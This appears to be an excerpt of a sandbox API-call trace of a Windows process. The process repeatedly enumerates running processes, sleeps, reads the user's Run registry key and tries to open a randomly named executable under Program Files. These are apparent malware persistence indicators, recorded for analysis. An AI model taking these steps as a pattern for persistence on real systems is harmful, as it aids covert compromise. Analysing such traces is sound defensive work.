ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0295.422] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de120) returned 1 [0295.422] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0295.422] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0295.425] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0295.425] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0295.426] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0295.566] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0295.567] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0295.569] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0295.570] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0295.570] NtClose (Handle=0x338) returned 0x0 [0295.570] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0295.570] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0295.571] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5deaa0) returned 1 [0295.571] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0295.571] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0295.571] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de420) returned 1 [0295.571] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0295.571] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0295.574] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0295.574] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0295.575] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0295.691] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0295.692] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0295.693] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0295.694] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0295.694] NtClose (Handle=0x338) returned 0x0 [0295.694] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0295.694] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0295.694] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5ddfa0) returned 1 [0295.694] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0295.694] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0295.694] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de920) returned 1 [0295.694] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0295.695] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0295.698] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0295.698] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0295.698] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0295.820] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0295.821] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0295.823] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0295.824] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0295.824] NtClose (Handle=0x338) returned 0x0 [0295.824] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0295.825] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0295.825] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de4a0) returned 1 [0295.825] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0295.825] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0295.825] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5deaa0) returned 1 [0295.825] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0295.825] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0295.827] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0295.828] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0295.828] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0295.930] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0295.930] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0295.932] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0295.933] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0295.933] NtClose (Handle=0x338) returned 0x0 [0295.933] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0295.933] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0295.933] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5ddda0) returned 1 [0295.933] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0295.933] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0295.933] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de120) returned 1 [0295.933] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0295.933] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0295.935] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0295.936] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0295.936] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0296.042] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0296.043] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0296.053] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0296.054] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0296.054] NtClose (Handle=0x338) returned 0x0 [0296.054] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0296.054] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0296.054] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de120) returned 1 [0296.054] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0296.054] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0296.055] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de420) returned 1 [0296.055] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0296.055] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0296.059] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0296.060] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0296.060] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0296.168] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0296.168] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0296.170] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0296.172] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0296.172] NtClose (Handle=0x338) returned 0x0 [0296.172] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0296.172] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0296.172] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de7a0) returned 1 [0296.172] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0296.172] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0296.172] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5deaa0) returned 1 [0296.172] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0296.172] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0296.175] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0296.175] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0296.175] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0296.277] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0296.278] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0296.279] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 